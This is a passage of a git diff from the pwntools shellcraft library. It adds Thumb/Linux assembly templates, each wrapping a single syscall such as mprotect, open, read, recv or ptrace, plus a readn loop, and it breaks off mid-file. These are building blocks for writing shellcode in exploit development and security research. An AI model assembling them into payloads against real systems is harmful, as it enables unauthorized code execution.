deleted file mode 100644 index 5fe07db34..000000000 --- a/pwnlib/shellcraft/templates/thumb/linux/mov.asm +++ /dev/null @@ -1,20 +0,0 @@ -<% - from pwnlib.shellcraft import thumb - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context -%> -<%page args="dest, src"/> -<%docstring> - -Thin wrapper around :func:`pwnlib.shellcraft.thumb.mov`, which sets -`context.os` to `'linux'` before calling. - -Example: - - >>> print pwnlib.shellcraft.thumb.linux.mov('r1', 'SYS_execve').rstrip() - mov r1, #(SYS_execve) - - - -% with ctx.local(os = 'linux'): - ${thumb.mov(dest, src)} -% endwith diff --git a/pwnlib/shellcraft/templates/thumb/linux/mov.asm b/pwnlib/shellcraft/templates/thumb/linux/mov.asm new file mode 120000 index 000000000..92f037c18 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mov.asm @@ -0,0 +1 @@ +../mov.asm \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/thumb/linux/mprotect.asm b/pwnlib/shellcraft/templates/thumb/linux/mprotect.asm new file mode 100644 index 000000000..e8b108295 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="addr, len, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + len(size_t): len + prot(int): prot + + + ${syscall('SYS_mprotect', addr, len, prot)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mq_notify.asm b/pwnlib/shellcraft/templates/thumb/linux/mq_notify.asm new file mode 100644 index 000000000..3fddbe3a1 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mq_notify.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mq_open.asm b/pwnlib/shellcraft/templates/thumb/linux/mq_open.asm new file mode 100644 index 000000000..aa2b9f8c1 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mq_open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/thumb/linux/mq_timedreceive.asm new file mode 100644 index 000000000..b93ecacda --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/thumb/linux/mq_timedsend.asm new file mode 100644 index 000000000..3521a3c35 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/thumb/linux/mq_unlink.asm new file mode 100644 index 000000000..a536bba54 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/mremap.asm b/pwnlib/shellcraft/templates/thumb/linux/mremap.asm new file mode 100644 index 000000000..de78d805a --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/msync.asm b/pwnlib/shellcraft/templates/thumb/linux/msync.asm new file mode 100644 index 000000000..756ba0102 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/munlock.asm b/pwnlib/shellcraft/templates/thumb/linux/munlock.asm new file mode 100644 index 000000000..53c37dc25 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/munlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/munlockall.asm b/pwnlib/shellcraft/templates/thumb/linux/munlockall.asm new file mode 100644 index 000000000..0e8ea0252 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/munmap.asm b/pwnlib/shellcraft/templates/thumb/linux/munmap.asm new file mode 100644 index 000000000..9f3f5ae81 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munmap', addr, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/nanosleep.asm b/pwnlib/shellcraft/templates/thumb/linux/nanosleep.asm new file mode 100644 index 000000000..9adb867c4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/nice.asm b/pwnlib/shellcraft/templates/thumb/linux/nice.asm new file mode 100644 index 000000000..f129a79e0 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/open.asm b/pwnlib/shellcraft/templates/thumb/linux/open.asm new file mode 100644 index 000000000..a6de52f33 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/openat.asm b/pwnlib/shellcraft/templates/thumb/linux/openat.asm new file mode 100644 index 000000000..c8aa0de4e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/pause.asm b/pwnlib/shellcraft/templates/thumb/linux/pause.asm new file mode 100644 index 000000000..cccaeef80 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/pause.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/pipe.asm b/pwnlib/shellcraft/templates/thumb/linux/pipe.asm new file mode 100644 index 000000000..454fb901b --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/pipe.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/pipe2.asm b/pwnlib/shellcraft/templates/thumb/linux/pipe2.asm new file mode 100644 index 000000000..20bc91d51 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/poll.asm b/pwnlib/shellcraft/templates/thumb/linux/poll.asm new file mode 100644 index 000000000..9191dc694 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ppoll.asm b/pwnlib/shellcraft/templates/thumb/linux/ppoll.asm new file mode 100644 index 000000000..c9c64e524 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/prctl.asm b/pwnlib/shellcraft/templates/thumb/linux/prctl.asm new file mode 100644 index 000000000..95c13da9b --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="option, vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/pread.asm b/pwnlib/shellcraft/templates/thumb/linux/pread.asm new file mode 100644 index 000000000..2332ade35 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/preadv.asm b/pwnlib/shellcraft/templates/thumb/linux/preadv.asm new file mode 100644 index 000000000..77bfc7d97 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/preadv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/prlimit64.asm b/pwnlib/shellcraft/templates/thumb/linux/prlimit64.asm new file mode 100644 index 000000000..7f1cb0056 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/prlimit64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/profil.asm b/pwnlib/shellcraft/templates/thumb/linux/profil.asm new file mode 100644 index 000000000..e5b48a642 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ptrace.asm b/pwnlib/shellcraft/templates/thumb/linux/ptrace.asm new file mode 100644 index 000000000..d36bb9537 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ptrace.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="request, vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/push.asm b/pwnlib/shellcraft/templates/thumb/linux/push.asm deleted file mode 100644 index 8119ea535..000000000 --- a/pwnlib/shellcraft/templates/thumb/linux/push.asm +++ /dev/null @@ -1,22 +0,0 @@ -<% - from pwnlib.shellcraft import thumb - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context -%> -<%page args="value"/> -<%docstring> - -Thin wrapper around :func:`pwnlib.shellcraft.thumb.push`, which sets -`context.os` to `'linux'` before calling. - -Example: - - >>> print pwnlib.shellcraft.thumb.linux.push('SYS_execve').rstrip() - /* push 'SYS_execve' */ - mov r1, #11 - push {r1} - - - -% with ctx.local(os = 'linux'): - ${thumb.push(value)} -% endwith diff --git a/pwnlib/shellcraft/templates/thumb/linux/push.asm b/pwnlib/shellcraft/templates/thumb/linux/push.asm new file mode 120000 index 000000000..85ff2b0a1 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/push.asm @@ -0,0 +1 @@ +../push.asm \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/thumb/linux/putpmsg.asm b/pwnlib/shellcraft/templates/thumb/linux/putpmsg.asm new file mode 100644 index 000000000..e28f8bac0 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/pwrite.asm b/pwnlib/shellcraft/templates/thumb/linux/pwrite.asm new file mode 100644 index 000000000..5487878f4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/pwrite.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/pwritev.asm b/pwnlib/shellcraft/templates/thumb/linux/pwritev.asm new file mode 100644 index 000000000..8a480802e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/pwritev.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/read.asm b/pwnlib/shellcraft/templates/thumb/linux/read.asm new file mode 100644 index 000000000..b21b6d006 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/read.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf, nbytes"/> +<%docstring> +Invokes the syscall read. See 'man 2 read' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + + + ${syscall('SYS_read', fd, buf, nbytes)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/readahead.asm b/pwnlib/shellcraft/templates/thumb/linux/readahead.asm new file mode 100644 index 000000000..93897d679 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/readdir.asm b/pwnlib/shellcraft/templates/thumb/linux/readdir.asm new file mode 100644 index 000000000..33c6d862f --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/readlink.asm b/pwnlib/shellcraft/templates/thumb/linux/readlink.asm new file mode 100644 index 000000000..d7eecd100 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/readlinkat.asm b/pwnlib/shellcraft/templates/thumb/linux/readlinkat.asm new file mode 100644 index 000000000..e41ad4b27 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, path, buf, len"/> +<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/readn.asm b/pwnlib/shellcraft/templates/thumb/linux/readn.asm new file mode 100644 index 000000000..c248dda07 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/readn.asm @@ -0,0 +1,23 @@ +<% + from pwnlib.shellcraft.thumb.linux import read + from pwnlib.shellcraft.thumb import setregs + from pwnlib.shellcraft import common +%> +<%page args="fd, buf, nbytes"/> +<%docstring> +Reads exactly nbytes bytes from file descriptor fd into the buffer buf. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + +<% +readn_loop = common.label('readn_loop') +%> + ${setregs({'r3': buf, 'r4': nbytes})} +${readn_loop}: + ${read(fd, 'r3', 'r4')} + add r3, r3, r0 + subs r4, r4, r0 + bne ${readn_loop} diff --git a/pwnlib/shellcraft/templates/thumb/linux/readv.asm b/pwnlib/shellcraft/templates/thumb/linux/readv.asm new file mode 100644 index 000000000..aab81082e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/readv.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/recv.asm b/pwnlib/shellcraft/templates/thumb/linux/recv.asm new file mode 100644 index 000000000..85ba493b4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/recvfrom.asm b/pwnlib/shellcraft/templates/thumb/linux/recvfrom.asm new file mode 100644 index 000000000..72d6d323e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/recvfrom.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/thumb/linux/recvmmsg.asm new file mode 100644 index 000000000..948be48f4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/recvmsg.asm b/pwnlib/shellcraft/templates/thumb/linux/recvmsg.asm new file mode 100644 index 000000000..29ca168e6 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/thumb/linux/remap_file_pages.asm new file mode 100644 index 000000000..24e4390ad --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/remap_file_pages.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/rename.asm b/pwnlib/shellcraft/templates/thumb/linux/rename.asm new file mode 100644 index 000000000..2498c1585 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/renameat.asm b/pwnlib/shellcraft/templates/thumb/linux/renameat.asm new file mode 100644 index 000000000..767fdf4b2 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/rmdir.asm b/pwnlib/shellcraft/templates/thumb/linux/rmdir.asm new file mode 100644 index 000000000..6e5b13eb4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..719a881b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..485e25ea2 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_getaffinity.asm new file mode 100644 index 000000000..8e85552de --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + 